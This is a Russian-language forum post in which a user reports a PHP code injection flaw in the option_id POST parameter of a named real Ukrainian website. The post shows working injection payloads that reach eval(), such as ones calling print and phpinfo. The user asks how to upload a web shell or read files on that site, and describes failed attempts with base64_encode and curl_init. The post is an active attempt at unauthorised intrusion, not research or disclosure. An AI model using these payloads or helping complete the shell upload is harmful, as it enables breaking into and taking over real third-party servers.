Тема: PHP Code Injection
Показать сообщение отдельно

  #1  
Старый 16.07.2013, 23:48
assmaday
Новичок
Регистрация: 03.02.2013
Сообщений: 13
С нами: 6985046

Репутация: 0
По умолчанию

Нашел уязвимость в POST параметре option_id на сайте

http://www. shans.com. ua/

HackBar'ом передаю POST запрос

option_id={${$print(1)}}{${$print(1)}}{${$print(1) }}

option_id={${$phpinfo()}}

Скрипт отрабатывает.... Данные передаются в eval()

Кавычки экранируются.... Как залить шелл или прочитать файлы... base64_encode() не срабатывает... пытался залить через curl_init()....

Непойму почему данные передаются в "{}" без ";"

Вот так не работает {${$a=1; $print($a);}...

А так выводит данные - {${$a=1}}{${$print($a)}}

в гугле не нашел как выглядит данный скрипт...

Если есть чтото подобное киньте ссылку...
 
Ответить с цитированием